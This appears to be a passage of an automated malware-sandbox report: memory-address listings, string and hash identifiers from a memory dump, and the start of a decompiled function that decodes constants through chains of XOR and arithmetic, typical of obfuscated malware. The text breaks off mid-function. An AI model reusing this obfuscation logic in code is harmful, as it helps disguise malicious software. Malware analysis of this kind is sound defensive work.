                                                                                                                                                                                                                    0x00a68189
                                                                                                                                                                                                                    0x00a68191
                                                                                                                                                                                                                    0x00a6819c
                                                                                                                                                                                                                    0x00a681a4
                                                                                                                                                                                                                    0x00a681b2
                                                                                                                                                                                                                    0x00a681b6
                                                                                                                                                                                                                    0x00a681be
                                                                                                                                                                                                                    0x00a681c6
                                                                                                                                                                                                                    0x00a681d9
                                                                                                                                                                                                                    0x00a681e0
                                                                                                                                                                                                                    0x00a681eb
                                                                                                                                                                                                                    0x00a681f6
                                                                                                                                                                                                                    0x00a68201
                                                                                                                                                                                                                    0x00a6820c
                                                                                                                                                                                                                    0x00a68217
                                                                                                                                                                                                                    0x00a6821f
                                                                                                                                                                                                                    0x00a68224
                                                                                                                                                                                                                    0x00a6822c
                                                                                                                                                                                                                    0x00a68234
                                                                                                                                                                                                                    0x00a6823c
                                                                                                                                                                                                                    0x00a68247
                                                                                                                                                                                                                    0x00a68252
                                                                                                                                                                                                                    0x00a6825d
                                                                                                                                                                                                                    0x00a68268
                                                                                                                                                                                                                    0x00a68270
                                                                                                                                                                                                                    0x00a6827b
                                                                                                                                                                                                                    0x00a68286
                                                                                                                                                                                                                    0x00a68291
                                                                                                                                                                                                                    0x00a6829c
                                                                                                                                                                                                                    0x00a682a7
                                                                                                                                                                                                                    0x00a682af
                                                                                                                                                                                                                    0x00a682b9
                                                                                                                                                                                                                    0x00a682bd
                                                                                                                                                                                                                    0x00a682c5
                                                                                                                                                                                                                    0x00a682cd
                                                                                                                                                                                                                    0x00a682d8
                                                                                                                                                                                                                    0x00a682e0
                                                                                                                                                                                                                    0x00a682eb
                                                                                                                                                                                                                    0x00a682f6
                                                                                                                                                                                                                    0x00a68301
                                                                                                                                                                                                                    0x00a6830e
                                                                                                                                                                                                                    0x00a68322
                                                                                                                                                                                                                    0x00a68327
                                                                                                                                                                                                                    0x00a68330
                                                                                                                                                                                                                    0x00a6833b
                                                                                                                                                                                                                    0x00a68346
                                                                                                                                                                                                                    0x00a68351
                                                                                                                                                                                                                    0x00a6835c
                                                                                                                                                                                                                    0x00a68367
                                                                                                                                                                                                                    0x00a6836f
                                                                                                                                                                                                                    0x00a6837a
                                                                                                                                                                                                                    0x00a68385
                                                                                                                                                                                                                    0x00a68390
                                                                                                                                                                                                                    0x00a6839b
                                                                                                                                                                                                                    0x00a683a6
                                                                                                                                                                                                                    0x00a683b1
                                                                                                                                                                                                                    0x00a683bc
                                                                                                                                                                                                                    0x00a683c7
                                                                                                                                                                                                                    0x00a683cf
                                                                                                                                                                                                                    0x00a683d4
                                                                                                                                                                                                                    0x00a683dd
                                                                                                                                                                                                                    0x00a683e2
                                                                                                                                                                                                                    0x00a683e8
                                                                                                                                                                                                                    0x00a683f0
                                                                                                                                                                                                                    0x00a68402
                                                                                                                                                                                                                    0x00a68407
                                                                                                                                                                                                                    0x00a6840e
                                                                                                                                                                                                                    0x00a68419
                                                                                                                                                                                                                    0x00a68424
                                                                                                                                                                                                                    0x00a6842f
                                                                                                                                                                                                                    0x00a6843a
                                                                                                                                                                                                                    0x00a68445
                                                                                                                                                                                                                    0x00a6844d
                                                                                                                                                                                                                    0x00a68458
                                                                                                                                                                                                                    0x00a68460
                                                                                                                                                                                                                    0x00a68468
                                                                                                                                                                                                                    0x00a68477
                                                                                                                                                                                                                    0x00a68478
                                                                                                                                                                                                                    0x00a6847c
                                                                                                                                                                                                                    0x00a68484
                                                                                                                                                                                                                    0x00a6848f
                                                                                                                                                                                                                    0x00a68497
                                                                                                                                                                                                                    0x00a6849e
                                                                                                                                                                                                                    0x00a684a9
                                                                                                                                                                                                                    0x00a684b1
                                                                                                                                                                                                                    0x00a684bc
                                                                                                                                                                                                                    0x00a684d0
                                                                                                                                                                                                                    0x00a684d7
                                                                                                                                                                                                                    0x00a684e2
                                                                                                                                                                                                                    0x00a684ed
                                                                                                                                                                                                                    0x00a684f8
                                                                                                                                                                                                                    0x00a68500
                                                                                                                                                                                                                    0x00a68508
                                                                                                                                                                                                                    0x00a68510
                                                                                                                                                                                                                    0x00a6851b
                                                                                                                                                                                                                    0x00a68523
                                                                                                                                                                                                                    0x00a68528
                                                                                                                                                                                                                    0x00a68530
                                                                                                                                                                                                                    0x00a68535
                                                                                                                                                                                                                    0x00a6853d
                                                                                                                                                                                                                    0x00a68545
                                                                                                                                                                                                                    0x00a68557
                                                                                                                                                                                                                    0x00a68560
                                                                                                                                                                                                                    0x00a6856b
                                                                                                                                                                                                                    0x00a68576
                                                                                                                                                                                                                    0x00a68582
                                                                                                                                                                                                                    0x00a68587
                                                                                                                                                                                                                    0x00a6858d
                                                                                                                                                                                                                    0x00a68595
                                                                                                                                                                                                                    0x00a6859d
                                                                                                                                                                                                                    0x00a685a8
                                                                                                                                                                                                                    0x00a685b0
                                                                                                                                                                                                                    0x00a685bb
                                                                                                                                                                                                                    0x00a685c6
                                                                                                                                                                                                                    0x00a685d1
                                                                                                                                                                                                                    0x00a685d8
                                                                                                                                                                                                                    0x00a685dd
                                                                                                                                                                                                                    0x00a685e6
                                                                                                                                                                                                                    0x00a685f1
                                                                                                                                                                                                                    0x00a685fc
                                                                                                                                                                                                                    0x00a68607
                                                                                                                                                                                                                    0x00a68612
                                                                                                                                                                                                                    0x00a6861a
                                                                                                                                                                                                                    0x00a68627
                                                                                                                                                                                                                    0x00a68628
                                                                                                                                                                                                                    0x00a6862c
                                                                                                                                                                                                                    0x00a68634
                                                                                                                                                                                                                    0x00a6863c
                                                                                                                                                                                                                    0x00a68647
                                                                                                                                                                                                                    0x00a68652
                                                                                                                                                                                                                    0x00a6865d
                                                                                                                                                                                                                    0x00a68668
                                                                                                                                                                                                                    0x00a68673
                                                                                                                                                                                                                    0x00a6867e
                                                                                                                                                                                                                    0x00a68689
                                                                                                                                                                                                                    0x00a68694
                                                                                                                                                                                                                    0x00a6869f
                                                                                                                                                                                                                    0x00a686aa
                                                                                                                                                                                                                    0x00a686b2
                                                                                                                                                                                                                    0x00a686c0
                                                                                                                                                                                                                    0x00a686c4
                                                                                                                                                                                                                    0x00a686cc
                                                                                                                                                                                                                    0x00a686d4
                                                                                                                                                                                                                    0x00a686df
                                                                                                                                                                                                                    0x00a686ea
                                                                                                                                                                                                                    0x00a686f5
                                                                                                                                                                                                                    0x00a68700
                                                                                                                                                                                                                    0x00a6870b
                                                                                                                                                                                                                    0x00a68716
                                                                                                                                                                                                                    0x00a68721
                                                                                                                                                                                                                    0x00a6872c
                                                                                                                                                                                                                    0x00a68737
                                                                                                                                                                                                                    0x00a6874a
                                                                                                                                                                                                                    0x00a68751
                                                                                                                                                                                                                    0x00a6875c
                                                                                                                                                                                                                    0x00a68764
                                                                                                                                                                                                                    0x00a68769
                                                                                                                                                                                                                    0x00a68776
                                                                                                                                                                                                                    0x00a6877a
                                                                                                                                                                                                                    0x00a68782
                                                                                                                                                                                                                    0x00a6878a
                                                                                                                                                                                                                    0x00a68792
                                                                                                                                                                                                                    0x00a6879a
                                                                                                                                                                                                                    0x00a687a2
                                                                                                                                                                                                                    0x00a687aa
                                                                                                                                                                                                                    0x00a687b2
                                                                                                                                                                                                                    0x00a687ba
                                                                                                                                                                                                                    0x00a687c2
                                                                                                                                                                                                                    0x00a687cc
                                                                                                                                                                                                                    0x00a687d4
                                                                                                                                                                                                                    0x00a687d9
                                                                                                                                                                                                                    0x00a687e4
                                                                                                                                                                                                                    0x00a687ef
                                                                                                                                                                                                                    0x00a687fa
                                                                                                                                                                                                                    0x00a68805
                                                                                                                                                                                                                    0x00a68810
                                                                                                                                                                                                                    0x00a68818
                                                                                                                                                                                                                    0x00a68823
                                                                                                                                                                                                                    0x00a6882e
                                                                                                                                                                                                                    0x00a68839
                                                                                                                                                                                                                    0x00a6884d
                                                                                                                                                                                                                    0x00a68850
                                                                                                                                                                                                                    0x00a68857
                                                                                                                                                                                                                    0x00a6885f
                                                                                                                                                                                                                    0x00a6886a
                                                                                                                                                                                                                    0x00a68875
                                                                                                                                                                                                                    0x00a68880
                                                                                                                                                                                                                    0x00a6888b
                                                                                                                                                                                                                    0x00a6888b
                                                                                                                                                                                                                    0x00a6888b
                                                                                                                                                                                                                    0x00a68890
                                                                                                                                                                                                                    0x00a68895
                                                                                                                                                                                                                    0x00a6889a
                                                                                                                                                                                                                    0x00a6889a
                                                                                                                                                                                                                    0x00a6889a
                                                                                                                                                                                                                    0x00a6889a
                                                                                                                                                                                                                    0x00a688a0
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a688a6
                                                                                                                                                                                                                    0x00a68b0c
                                                                                                                                                                                                                    0x00a68b11
                                                                                                                                                                                                                    0x00a68b14
                                                                                                                                                                                                                    0x00a6888b
                                                                                                                                                                                                                    0x00a6888b
                                                                                                                                                                                                                    0x00a6888b
                                                                                                                                                                                                                    0x00a68890
                                                                                                                                                                                                                    0x00a68895
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a68895
                                                                                                                                                                                                                    0x00a688ac
                                                                                                                                                                                                                    0x00a688ae
                                                                                                                                                                                                                    0x00a68a46
                                                                                                                                                                                                                    0x00a68a52
                                                                                                                                                                                                                    0x00a68a56
                                                                                                                                                                                                                    0x00a68acb
                                                                                                                                                                                                                    0x00a68ae0
                                                                                                                                                                                                                    0x00a68ae3
                                                                                                                                                                                                                    0x00a68ae8
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a688b4
                                                                                                                                                                                                                    0x00a688b6
                                                                                                                                                                                                                    0x00a68d55
                                                                                                                                                                                                                    0x00a688bc
                                                                                                                                                                                                                    0x00a688c2
                                                                                                                                                                                                                    0x00a68a3c
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a688c8
                                                                                                                                                                                                                    0x00a688c8
                                                                                                                                                                                                                    0x00a688ca
                                                                                                                                                                                                                    0x00a688d0
                                                                                                                                                                                                                    0x00a688dc
                                                                                                                                                                                                                    0x00a688e3
                                                                                                                                                                                                                    0x00a688f1
                                                                                                                                                                                                                    0x00a688f6
                                                                                                                                                                                                                    0x00a68902
                                                                                                                                                                                                                    0x00a68904
                                                                                                                                                                                                                    0x00a6890b
                                                                                                                                                                                                                    0x00a68919
                                                                                                                                                                                                                    0x00a68930
                                                                                                                                                                                                                    0x00a68942
                                                                                                                                                                                                                    0x00a68949
                                                                                                                                                                                                                    0x00a6894a
                                                                                                                                                                                                                    0x00a68959
                                                                                                                                                                                                                    0x00a68960
                                                                                                                                                                                                                    0x00a6896e
                                                                                                                                                                                                                    0x00a6898b
                                                                                                                                                                                                                    0x00a68999
                                                                                                                                                                                                                    0x00a689dd
                                                                                                                                                                                                                    0x00a68a03
                                                                                                                                                                                                                    0x00a68a11
                                                                                                                                                                                                                    0x00a68a2a
                                                                                                                                                                                                                    0x00a68a2f
                                                                                                                                                                                                                    0x00a68a32
                                                                                                                                                                                                                    0x00a68a32
                                                                                                                                                                                                                    0x00a68d0e
                                                                                                                                                                                                                    0x00a68d0e
                                                                                                                                                                                                                    0x00a68d13
                                                                                                                                                                                                                    0x00a68d18
                                                                                                                                                                                                                    0x00a68d18
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a688ca
                                                                                                                                                                                                                    0x00a688c2
                                                                                                                                                                                                                    0x00a688b6
                                                                                                                                                                                                                    0x00a688ae
                                                                                                                                                                                                                    0x00a68d5f
                                                                                                                                                                                                                    0x00a68d69
                                                                                                                                                                                                                    0x00a68d69
                                                                                                                                                                                                                    0x00a68b1b
                                                                                                                                                                                                                    0x00a68b1d
                                                                                                                                                                                                                    0x00a68cf4
                                                                                                                                                                                                                    0x00a68cfb
                                                                                                                                                                                                                    0x00a68cfe
                                                                                                                                                                                                                    0x00a68d00
                                                                                                                                                                                                                    0x00a68d0c
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a68d02
                                                                                                                                                                                                                    0x00a68d02
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a68d02
                                                                                                                                                                                                                    0x00a68b23
                                                                                                                                                                                                                    0x00a68b23
                                                                                                                                                                                                                    0x00a68b29
                                                                                                                                                                                                                    0x00a68c16
                                                                                                                                                                                                                    0x00a68c1f
                                                                                                                                                                                                                    0x00a68c26
                                                                                                                                                                                                                    0x00a68c31
                                                                                                                                                                                                                    0x00a68c36
                                                                                                                                                                                                                    0x00a68c44
                                                                                                                                                                                                                    0x00a68c48
                                                                                                                                                                                                                    0x00a68c97
                                                                                                                                                                                                                    0x00a68cac
                                                                                                                                                                                                                    0x00a68caf
                                                                                                                                                                                                                    0x00a68ccb
                                                                                                                                                                                                                    0x00a68cd0
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a68b2f
                                                                                                                                                                                                                    0x00a68b2f
                                                                                                                                                                                                                    0x00a68b35
                                                                                                                                                                                                                    0x00a68b3b
                                                                                                                                                                                                                    0x00a68b44
                                                                                                                                                                                                                    0x00a68b4b
                                                                                                                                                                                                                    0x00a68b5e
                                                                                                                                                                                                                    0x00a68b64
                                                                                                                                                                                                                    0x00a68b72
                                                                                                                                                                                                                    0x00a68b84
                                                                                                                                                                                                                    0x00a68bd9
                                                                                                                                                                                                                    0x00a68bde
                                                                                                                                                                                                                    0x00a68be1
                                                                                                                                                                                                                    0x00a68be8
                                                                                                                                                                                                                    0x00a68bf1
                                                                                                                                                                                                                    0x00a68bea
                                                                                                                                                                                                                    0x00a68bec
                                                                                                                                                                                                                    0x00a68bee
                                                                                                                                                                                                                    0x00a68bee
                                                                                                                                                                                                                    0x00a68c0a
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a68c10
                                                                                                                                                                                                                    0x00a68b35
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a68b29
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a68d1d
                                                                                                                                                                                                                    0x00a68d1d
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a68d29

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: )8}$014$1a$9Q$:Q3$:q$<$Cwg$HZF$MRt$MX$S*h{$Y;|$a:M$i4/$k3$q$u>K$v$ $/$@
                                                                                                                                                                                                                    • API String ID: 0-453832260
                                                                                                                                                                                                                    • Opcode ID: 372614ab62a60646f7effe8521852b8cf705529179eaaacbe548bde08e136eb3
                                                                                                                                                                                                                    • Instruction ID: 1102c2294d5ba5d626742a0234fb7b8bbd2edb73f1e626c74432d3b217afb32e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 372614ab62a60646f7effe8521852b8cf705529179eaaacbe548bde08e136eb3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 81A2EE715093818FE3B9CF25C94AB8BBBE1BBD4708F10891DE1D996260DBB58949CF43
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                                                                                    			E00A7F1AF() {
                                                                                                                                                                                                                    				char _v24;
                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                    				char _v68;
                                                                                                                                                                                                                    				char _v80;
                                                                                                                                                                                                                    				signed int _v88;
                                                                                                                                                                                                                    				signed int _v92;
                                                                                                                                                                                                                    				signed int _v100;
                                                                                                                                                                                                                    				signed int _v108;
                                                                                                                                                                                                                    				intOrPtr _v112;
                                                                                                                                                                                                                    				signed int _v124;
                                                                                                                                                                                                                    				signed int _v128;
                                                                                                                                                                                                                    				char _v140;
                                                                                                                                                                                                                    				signed int _v144;
                                                                                                                                                                                                                    				intOrPtr _v148;
                                                                                                                                                                                                                    				intOrPtr _v152;
                                                                                                                                                                                                                    				signed int _v160;
                                                                                                                                                                                                                    				signed int _v168;
                                                                                                                                                                                                                    				void* _v172;
                                                                                                                                                                                                                    				char _v176;
                                                                                                                                                                                                                    				void* _v180;
                                                                                                                                                                                                                    				char _v184;
                                                                                                                                                                                                                    				signed int _v188;
                                                                                                                                                                                                                    				signed int _v192;
                                                                                                                                                                                                                    				signed int _v196;
                                                                                                                                                                                                                    				signed int _v200;
                                                                                                                                                                                                                    				signed int _v204;
                                                                                                                                                                                                                    				unsigned int _v208;
                                                                                                                                                                                                                    				signed int _v212;
                                                                                                                                                                                                                    				unsigned int _v216;
                                                                                                                                                                                                                    				signed int _v220;
                                                                                                                                                                                                                    				signed int _v224;
                                                                                                                                                                                                                    				signed int _v228;
                                                                                                                                                                                                                    				signed int _v232;
                                                                                                                                                                                                                    				signed int _v236;
                                                                                                                                                                                                                    				signed int _v240;
                                                                                                                                                                                                                    				signed int _v244;
                                                                                                                                                                                                                    				signed int _v248;
                                                                                                                                                                                                                    				signed int _v252;
                                                                                                                                                                                                                    				signed int _v256;
                                                                                                                                                                                                                    				signed int _v260;
                                                                                                                                                                                                                    				signed int _v264;
                                                                                                                                                                                                                    				signed int _v268;
                                                                                                                                                                                                                    				signed int _v272;
                                                                                                                                                                                                                    				signed int _v276;
                                                                                                                                                                                                                    				unsigned int _v280;
                                                                                                                                                                                                                    				signed int _v284;
                                                                                                                                                                                                                    				signed int _v288;
                                                                                                                                                                                                                    				signed int _v292;
                                                                                                                                                                                                                    				signed int _v296;
                                                                                                                                                                                                                    				signed int _v300;
                                                                                                                                                                                                                    				signed int _v304;
                                                                                                                                                                                                                    				unsigned int _v308;
                                                                                                                                                                                                                    				signed int _v312;
                                                                                                                                                                                                                    				signed int _v316;
                                                                                                                                                                                                                    				signed int _v320;
                                                                                                                                                                                                                    				signed int _v324;
                                                                                                                                                                                                                    				signed int _v328;
                                                                                                                                                                                                                    				signed int _v332;
                                                                                                                                                                                                                    				signed int _v336;
                                                                                                                                                                                                                    				signed int _v340;
                                                                                                                                                                                                                    				unsigned int _v344;
                                                                                                                                                                                                                    				signed int _v348;
                                                                                                                                                                                                                    				signed int _v352;
                                                                                                                                                                                                                    				signed int _v356;
                                                                                                                                                                                                                    				signed int _v360;
                                                                                                                                                                                                                    				signed int _v364;
                                                                                                                                                                                                                    				signed int _v368;
                                                                                                                                                                                                                    				signed int _v372;
                                                                                                                                                                                                                    				signed int _v376;
                                                                                                                                                                                                                    				signed int _v380;
                                                                                                                                                                                                                    				signed int _v384;
                                                                                                                                                                                                                    				signed int _v388;
                                                                                                                                                                                                                    				unsigned int _v392;
                                                                                                                                                                                                                    				signed int _v396;
                                                                                                                                                                                                                    				signed int _v400;
                                                                                                                                                                                                                    				signed int _v404;
                                                                                                                                                                                                                    				signed int _v408;
                                                                                                                                                                                                                    				signed int _v412;
                                                                                                                                                                                                                    				signed int _v416;
                                                                                                                                                                                                                    				signed int _v420;
                                                                                                                                                                                                                    				signed int _v424;
                                                                                                                                                                                                                    				signed int _v428;
                                                                                                                                                                                                                    				signed int _v432;
                                                                                                                                                                                                                    				signed int _v436;
                                                                                                                                                                                                                    				signed int _v440;
                                                                                                                                                                                                                    				signed int _v444;
                                                                                                                                                                                                                    				signed int _v448;
                                                                                                                                                                                                                    				signed int _v452;
                                                                                                                                                                                                                    				signed int _v456;
                                                                                                                                                                                                                    				signed int _v460;
                                                                                                                                                                                                                    				signed int _v464;
                                                                                                                                                                                                                    				signed int _v468;
                                                                                                                                                                                                                    				signed int _v472;
                                                                                                                                                                                                                    				signed int _v476;
                                                                                                                                                                                                                    				signed int _v480;
                                                                                                                                                                                                                    				signed int _v484;
                                                                                                                                                                                                                    				signed int _v488;
                                                                                                                                                                                                                    				signed int _v492;
                                                                                                                                                                                                                    				signed int _v496;
                                                                                                                                                                                                                    				signed int _v500;
                                                                                                                                                                                                                    				signed int _v504;
                                                                                                                                                                                                                    				signed int _v508;
                                                                                                                                                                                                                    				signed int _v512;
                                                                                                                                                                                                                    				signed int _v516;
                                                                                                                                                                                                                    				signed int _v520;
                                                                                                                                                                                                                    				signed int _v524;
                                                                                                                                                                                                                    				signed int _v528;
                                                                                                                                                                                                                    				signed int _v532;
                                                                                                                                                                                                                    				signed int _v536;
                                                                                                                                                                                                                    				signed int _v540;
                                                                                                                                                                                                                    				signed int _v544;
                                                                                                                                                                                                                    				signed int _v548;
                                                                                                                                                                                                                    				signed int _v552;
                                                                                                                                                                                                                    				signed int _v556;
                                                                                                                                                                                                                    				signed int _v560;
                                                                                                                                                                                                                    				signed int _v564;
                                                                                                                                                                                                                    				signed int _v568;
                                                                                                                                                                                                                    				signed int _v572;
                                                                                                                                                                                                                    				unsigned int _v576;
                                                                                                                                                                                                                    				signed int _v580;
                                                                                                                                                                                                                    				signed int _v584;
                                                                                                                                                                                                                    				signed int _v588;
                                                                                                                                                                                                                    				signed int _v592;
                                                                                                                                                                                                                    				signed int _v596;
                                                                                                                                                                                                                    				signed int _v600;
                                                                                                                                                                                                                    				signed int _v604;
                                                                                                                                                                                                                    				signed int _v608;
                                                                                                                                                                                                                    				signed int _v612;
                                                                                                                                                                                                                    				signed int _v616;
                                                                                                                                                                                                                    				unsigned int _v620;
                                                                                                                                                                                                                    				signed int _v624;
                                                                                                                                                                                                                    				signed int _v628;
                                                                                                                                                                                                                    				signed int _v632;
                                                                                                                                                                                                                    				signed int _v636;
                                                                                                                                                                                                                    				signed int _t1166;
                                                                                                                                                                                                                    				signed int _t1168;
                                                                                                                                                                                                                    				signed int _t1174;
                                                                                                                                                                                                                    				signed int _t1192;
                                                                                                                                                                                                                    				signed int _t1239;
                                                                                                                                                                                                                    				void* _t1243;
                                                                                                                                                                                                                    				signed int _t1244;
                                                                                                                                                                                                                    				signed int _t1245;
                                                                                                                                                                                                                    				signed int _t1246;
                                                                                                                                                                                                                    				signed int _t1247;
                                                                                                                                                                                                                    				signed int _t1248;
                                                                                                                                                                                                                    				signed int _t1249;
                                                                                                                                                                                                                    				signed int _t1250;
                                                                                                                                                                                                                    				signed int _t1251;
                                                                                                                                                                                                                    				signed int _t1252;
                                                                                                                                                                                                                    				signed int _t1253;
                                                                                                                                                                                                                    				signed int _t1254;
                                                                                                                                                                                                                    				signed int _t1255;
                                                                                                                                                                                                                    				signed int _t1256;
                                                                                                                                                                                                                    				signed int _t1257;
                                                                                                                                                                                                                    				signed int _t1258;
                                                                                                                                                                                                                    				signed int _t1259;
                                                                                                                                                                                                                    				signed int _t1260;
                                                                                                                                                                                                                    				signed int _t1261;
                                                                                                                                                                                                                    				signed int _t1262;
                                                                                                                                                                                                                    				signed int _t1263;
                                                                                                                                                                                                                    				signed int _t1264;
                                                                                                                                                                                                                    				signed int _t1265;
                                                                                                                                                                                                                    				signed int _t1266;
                                                                                                                                                                                                                    				signed int _t1267;
                                                                                                                                                                                                                    				signed int _t1268;
                                                                                                                                                                                                                    				signed int _t1272;
                                                                                                                                                                                                                    				signed int _t1370;
                                                                                                                                                                                                                    				signed int _t1371;
                                                                                                                                                                                                                    				signed int _t1377;
                                                                                                                                                                                                                    				void* _t1379;
                                                                                                                                                                                                                    				signed int _t1383;
                                                                                                                                                                                                                    				signed int _t1402;
                                                                                                                                                                                                                    				signed int _t1405;
                                                                                                                                                                                                                    				void* _t1407;
                                                                                                                                                                                                                    				void* _t1411;
                                                                                                                                                                                                                    				void* _t1412;
                                                                                                                                                                                                                    				void* _t1413;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t1407 = (_t1405 & 0xfffffff8) - 0x278;
                                                                                                                                                                                                                    				_v144 = _v144 & 0x00000000;
                                                                                                                                                                                                                    				_v152 = 0xeb370a;
                                                                                                                                                                                                                    				_v148 = 0x75c3b1;
                                                                                                                                                                                                                    				_v608 = 0x50c3c1;
                                                                                                                                                                                                                    				_v608 = _v608 + 0xfffff733;
                                                                                                                                                                                                                    				_v608 = _v608 >> 4;
                                                                                                                                                                                                                    				_v608 = _v608 ^ 0x4fa1b5f6;
                                                                                                                                                                                                                    				_v608 = _v608 ^ 0x4fa4bf5b;
                                                                                                                                                                                                                    				_v536 = 0xc6e9de;
                                                                                                                                                                                                                    				_v536 = _v536 + 0x3245;
                                                                                                                                                                                                                    				_v536 = _v536 + 0xcdeb;
                                                                                                                                                                                                                    				_v536 = _v536 + 0xffff8a81;
                                                                                                                                                                                                                    				_v536 = _v536 ^ 0x00c7748f;
                                                                                                                                                                                                                    				_v464 = 0x3cdb2c;
                                                                                                                                                                                                                    				_v464 = _v464 << 5;
                                                                                                                                                                                                                    				_v464 = _v464 >> 1;
                                                                                                                                                                                                                    				_v464 = _v464 ^ 0x03cdb2c0;
                                                                                                                                                                                                                    				_v580 = 0xa9210;
                                                                                                                                                                                                                    				_v580 = _v580 >> 3;
                                                                                                                                                                                                                    				_t1244 = 0x78;
                                                                                                                                                                                                                    				_v580 = _v580 / _t1244;
                                                                                                                                                                                                                    				_v580 = _v580 ^ 0xb18e1028;
                                                                                                                                                                                                                    				_t1379 = 0x71f92c4;
                                                                                                                                                                                                                    				_v580 = _v580 ^ 0xb180c386;
                                                                                                                                                                                                                    				_v440 = 0xd24e7b;
                                                                                                                                                                                                                    				_t1370 = 0x6c;
                                                                                                                                                                                                                    				_v440 = _v440 * 0x7a;
                                                                                                                                                                                                                    				_v440 = _v440 << 7;
                                                                                                                                                                                                                    				_v440 = _v440 ^ 0x1cbbec58;
                                                                                                                                                                                                                    				_v448 = 0x61d6c0;
                                                                                                                                                                                                                    				_v448 = _v448 + 0xffff5c4d;
                                                                                                                                                                                                                    				_v448 = _v448 << 7;
                                                                                                                                                                                                                    				_v448 = _v448 ^ 0x309828d5;
                                                                                                                                                                                                                    				_v504 = 0x8eacd5;
                                                                                                                                                                                                                    				_v504 = _v504 ^ 0x2b14129e;
                                                                                                                                                                                                                    				_v504 = _v504 + 0xffff4881;
                                                                                                                                                                                                                    				_v504 = _v504 + 0x7ea1;
                                                                                                                                                                                                                    				_v504 = _v504 ^ 0x2b986118;
                                                                                                                                                                                                                    				_v600 = 0xc09432;
                                                                                                                                                                                                                    				_v600 = _v600 | 0x2eea91da;
                                                                                                                                                                                                                    				_v600 = _v600 << 5;
                                                                                                                                                                                                                    				_v600 = _v600 ^ 0x379f5cb0;
                                                                                                                                                                                                                    				_v600 = _v600 ^ 0xeace9c18;
                                                                                                                                                                                                                    				_v268 = 0xed64a7;
                                                                                                                                                                                                                    				_v268 = _v268 ^ 0x6f657a7f;
                                                                                                                                                                                                                    				_v268 = _v268 ^ 0x6f811c4f;
                                                                                                                                                                                                                    				_v348 = 0xb0fd85;
                                                                                                                                                                                                                    				_v348 = _v348 * 0x61;
                                                                                                                                                                                                                    				_v348 = _v348 + 0xffffc71b;
                                                                                                                                                                                                                    				_v348 = _v348 ^ 0x430a4e67;
                                                                                                                                                                                                                    				_v552 = 0x15cd7b;
                                                                                                                                                                                                                    				_v552 = _v552 * 0x21;
                                                                                                                                                                                                                    				_v552 = _v552 | 0xfef6fb3f;
                                                                                                                                                                                                                    				_v552 = _v552 ^ 0xfef4e7f8;
                                                                                                                                                                                                                    				_v360 = 0x57bdbd;
                                                                                                                                                                                                                    				_v360 = _v360 + 0xffff72d6;
                                                                                                                                                                                                                    				_v360 = _v360 + 0x4989;
                                                                                                                                                                                                                    				_v360 = _v360 ^ 0x005c0f57;
                                                                                                                                                                                                                    				_v460 = 0xab097d;
                                                                                                                                                                                                                    				_v460 = _v460 ^ 0x3efab7dc;
                                                                                                                                                                                                                    				_v460 = _v460 ^ 0x3e5febd8;
                                                                                                                                                                                                                    				_v496 = 0xb2a870;
                                                                                                                                                                                                                    				_v496 = _v496 + 0x3ecb;
                                                                                                                                                                                                                    				_v496 = _v496 | 0x989177f5;
                                                                                                                                                                                                                    				_v496 = _v496 / _t1370;
                                                                                                                                                                                                                    				_v496 = _v496 ^ 0x0165d089;
                                                                                                                                                                                                                    				_v432 = 0xe276b4;
                                                                                                                                                                                                                    				_v432 = _v432 << 0xc;
                                                                                                                                                                                                                    				_v432 = _v432 | 0xf4a357d3;
                                                                                                                                                                                                                    				_v432 = _v432 ^ 0xf7e03823;
                                                                                                                                                                                                                    				_v188 = 0x871d61;
                                                                                                                                                                                                                    				_t1245 = 0x4a;
                                                                                                                                                                                                                    				_v188 = _v188 * 0x52;
                                                                                                                                                                                                                    				_v188 = _v188 ^ 0x2b44ce53;
                                                                                                                                                                                                                    				_v372 = 0x95ce21;
                                                                                                                                                                                                                    				_v372 = _v372 + 0xd2c9;
                                                                                                                                                                                                                    				_v372 = _v372 / _t1245;
                                                                                                                                                                                                                    				_v372 = _v372 ^ 0x000a36c7;
                                                                                                                                                                                                                    				_v344 = 0xe4e4c9;
                                                                                                                                                                                                                    				_v344 = _v344 + 0xffffc751;
                                                                                                                                                                                                                    				_v344 = _v344 >> 1;
                                                                                                                                                                                                                    				_v344 = _v344 ^ 0x007321c9;
                                                                                                                                                                                                                    				_v308 = 0xa96405;
                                                                                                                                                                                                                    				_v308 = _v308 >> 0x10;
                                                                                                                                                                                                                    				_v308 = _v308 ^ 0x000b3cc6;
                                                                                                                                                                                                                    				_v508 = 0x5501d6;
                                                                                                                                                                                                                    				_v508 = _v508 + 0x9f3a;
                                                                                                                                                                                                                    				_t1246 = 0x51;
                                                                                                                                                                                                                    				_v508 = _v508 * 0x65;
                                                                                                                                                                                                                    				_v508 = _v508 | 0xa5a09e8a;
                                                                                                                                                                                                                    				_v508 = _v508 ^ 0xa5e147fa;
                                                                                                                                                                                                                    				_v620 = 0xf5707e;
                                                                                                                                                                                                                    				_v620 = _v620 + 0x3815;
